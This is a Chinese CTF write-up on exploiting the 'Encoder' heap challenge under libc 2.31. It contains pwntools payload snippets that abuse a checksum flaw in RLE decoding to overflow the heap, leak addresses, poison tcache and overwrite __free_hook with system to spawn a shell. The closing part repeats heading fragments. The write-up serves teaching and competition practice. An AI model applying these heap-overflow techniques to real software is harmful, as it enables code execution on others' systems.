Pwn Encoder 题目分析与利用教学<\/h1>

题目概述<\/h2>
这是一个基于文件上传、压缩解压功能的堆利用题目，运行在libc 2.31环境下。题目提供了上传(upload)、释放(release)、下载(download)、编码(encode)和解码(decode)功能，实际上实现了增删查操作。<\/p>

关键数据结构<\/h2>

程序使用了一个结构体来管理数据，可以理解为：<\/p>

struct {
    void *ptr;      \/\/ 0x10字节 - 数据指针
    int size;       \/\/ 0x4字节  - 数据大小
    char buf[0x10]; \/\/ 0x10字节 - 小数据缓冲区
}
<\/code><\/pre>
功能分析<\/h2>
upload功能<\/h3>

输入index和size，size限制为不超过0x20000<\/li>
处理逻辑：

如果size ≤ 16：数据直接存储在结构体的buf中<\/li>
如果size > 16：

如果已有数据且新size更大：释放旧堆块，申请新堆块<\/li>
如果已有数据但新size不大：不做操作<\/li>
如果无数据：直接申请指定大小的堆块<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>
严格读取size大小的数据，类似进阶版calloc<\/li>
<\/ul>
download功能<\/h3>

根据index和size调用write函数输出数据<\/li>
相当于show功能<\/li>
<\/ul>
release功能<\/h3>

常规删除操作<\/li>
释放堆块并将指针和size置零<\/li>
无UAF漏洞<\/li>
<\/ul>
encode功能<\/h3>

对数据进行压缩编码<\/li>
压缩算法示例：

输入"aaaa"(\x61\x61\x61\x61) → 输出\x04\x61<\/li>
<\/ul>
<\/li>
处理流程：

根据size决定数据来源(buf或堆块)<\/li>
调用encode_0函数进行压缩<\/li>
释放原堆块<\/li>
新数据格式：<\/li>
<\/ol>

前4字节："RLE\n"魔术头<\/li>
接着4字节：编码后数据长度<\/li>
然后是编码数据<\/li>
最后是校验和(所有数据的ASCII码之和)<\/li>
<\/ul>
<\/li>
漏洞：释放原堆块但不清除size表<\/li>
<\/ul>
decode功能<\/h3>

检查魔术头"RLE\n"<\/li>
读取校验和(位于v3+v3[1]+8)<\/li>
根据校验和进行解压

校验和必须减到0才会停止<\/li>
正负值都会继续解压<\/li>
<\/ul>
<\/li>
漏洞点：

可伪造校验和导致溢出<\/li>
可覆盖后续堆块的size字段<\/li>
<\/ul>
<\/li>
<\/ul>
漏洞利用思路<\/h2>
核心漏洞<\/h3>
decode函数中的校验和验证不严格，可以通过伪造校验和实现堆溢出，覆盖后续堆块的size字段。<\/p>
利用步骤<\/h3>


伪造size<\/strong>：<\/p>

构造decode后的数据长度为0x14(0x14<<6=0x500)<\/li>
精心构造sum值使其能够覆盖下一个堆块的size<\/li>
<\/ul>
<\/li>

堆块重叠<\/strong>：<\/p>

释放伪造的堆块，形成大的unsorted bin<\/li>
申请0x500大小的堆块，利用残留指针泄露libc和堆地址<\/li>
<\/ul>
<\/li>

tcache投毒<\/strong>：<\/p>

再次释放大堆块恢复unsorted bin<\/li>
伪造小size使堆块进入tcache<\/li>
修改tcache的fd指向__free_hook<\/li>
<\/ul>
<\/li>

getshell<\/strong>：<\/p>

申请堆块到__free_hook位置<\/li>
写入system地址<\/li>
释放包含"\/bin\/sh"的堆块触发<\/li>
<\/ul>
<\/li>
<\/ol>
详细利用过程<\/h2>
1. 构造溢出条件<\/h3>
# 构造伪造的RLE数据<\/span>
<\/span><\/span>payload =<\/span> b<\/span>"RLE<\/span>\n<\/span>"<\/span> +<\/span> p32(0x14<\/span>)  # 魔术头和长度<\/span>
<\/span><\/span>payload +=<\/span> b<\/span>"<\/span>\x68\x20<\/span>"<\/span>  # 0x68个0x20<\/span>
<\/span><\/span>payload +=<\/span> b<\/span>"<\/span>\x60\x07<\/span>"<\/span>  # 0x60个0x07<\/span>
<\/span><\/span>payload +=<\/span> b<\/span>"<\/span>\x00\x00<\/span>"<\/span>  # 0x00个0x00<\/span>
<\/span><\/span>payload +=<\/span> b<\/span>"A"<\/span>*<\/span>0x10<\/span>   # 填充<\/span>
<\/span><\/span>payload +=<\/span> p64(0x1241<\/span>) # 覆盖size为0x1241<\/span>
<\/span><\/span>payload +=<\/span> b<\/span>"<\/span>\x06\x70<\/span>"<\/span> # 调整sum使其最终为0<\/span>
<\/span><\/span><\/code><\/pre>2. 泄露libc和堆地址<\/h3>
# 释放伪造的堆块<\/span>
<\/span><\/span>release(modified_chunk)
<\/span><\/span>
<\/span><\/span># 申请0x500大小的堆块获取残留指针<\/span>
<\/span><\/span>upload(1<\/span>, 0x500<\/span>, b<\/span>"dummy"<\/span>)
<\/span><\/span>
<\/span><\/span># 下载泄露信息<\/span>
<\/span><\/span>download(1<\/span>)
<\/span><\/span>leak =<\/span> get_leak()  # 从输出中解析libc和堆地址<\/span>
<\/span><\/span><\/code><\/pre>3. tcache投毒<\/h3>
# 重新释放大堆块<\/span>
<\/span><\/span>release(1<\/span>)
<\/span><\/span>
<\/span><\/span># 伪造小size进入tcache<\/span>
<\/span><\/span>upload(8<\/span>, 0x520<\/span>, b<\/span>"gggghhhh"<\/span>*<\/span>32<\/span>*<\/span>5<\/span> +<\/span> p64(0<\/span>) +<\/span> p64(0x41<\/span>) +<\/span> p64(0<\/span>)*<\/span>4<\/span>)
<\/span><\/span>
<\/span><\/span># 释放进入tcache<\/span>
<\/span><\/span>release(8<\/span>)
<\/span><\/span>
<\/span><\/span># 修改tcache fd<\/span>
<\/span><\/span>upload(9<\/span>, 0x40<\/span>, p64(libc.<\/span>sym.<\/span>__free_hook))
<\/span><\/span><\/code><\/pre>4. getshell<\/h3>
# 申请到__free_hook<\/span>
<\/span><\/span>upload(10<\/span>, 0x40<\/span>, b<\/span>"\/bin\/sh<\/span>\x00<\/span>"<\/span>)
<\/span><\/span>upload(11<\/span>, 0x40<\/span>, p64(libc.<\/span>sym.<\/span>system))
<\/span><\/span>
<\/span><\/span># 触发<\/span>
<\/span><\/span>release(10<\/span>)
<\/span><\/span><\/code><\/pre>Patch方法<\/h2>


修改魔术头<\/strong>：<\/p>

将数据段的"RLE"字符串改为其他值(如"RJE")<\/li>
可绕过encode\/decode的魔术头检查<\/li>
<\/ul>
<\/li>

替换malloc_usable_size<\/strong>：<\/p>

将malloc_usable_size patch为malloc<\/li>
改变堆分配行为<\/li>
<\/ul>
<\/li>
<\/ol>
调试技巧<\/h2>

重点关注decode函数中的sum计算和校验过程<\/li>
观察堆布局变化，特别是unsorted bin和tcache的状态<\/li>
计算精确的偏移量确保正确覆盖size字段<\/li>
调整sum伪造值使其最终能减到0<\/li>
<\/ol>
总结<\/h2>
本题通过decode函数的校验和漏洞实现堆溢出，结合堆风水技术完成利用。关键点在于：<\/p>

理解encode\/decode的数据格式<\/li>
精确构造伪造的RLE数据<\/li>
控制sum值实现可控溢出<\/li>
通过堆布局操作泄露关键地址<\/li>
最终通过tcache投毒劫持__free_hook<\/li>
<\/ul>
这种类型的题目考察了选手对堆管理机制的深入理解以及精确构造攻击数据的能力。<\/p>

Pwn Encoder 题目分析与利用教学<\/h1>

题目概述<\/h2> 这是一个基于文件上传、压缩解压功能的堆利用题目，运行在libc 2.31环境下。题目提供了上传(upload)、释放(release)、下载(download)、编码(encode)和解码(decode)功能，实际上实现了增删查操作。<\/p>

功能分析<\/h2>

漏洞利用思路<\/h2>

核心漏洞<\/h3> decode函数中的校验和验证不严格，可以通过伪造校验和实现堆溢出，覆盖后续堆块的size字段。<\/p>

详细利用过程<\/h2>

题目概述<\/h2>
这是一个基于文件上传、压缩解压功能的堆利用题目，运行在libc 2.31环境下。题目提供了上传(upload)、释放(release)、下载(download)、编码(encode)和解码(decode)功能，实际上实现了增删查操作。<\/p>

核心漏洞<\/h3>
decode函数中的校验和验证不严格，可以通过伪造校验和实现堆溢出，覆盖后续堆块的size字段。<\/p>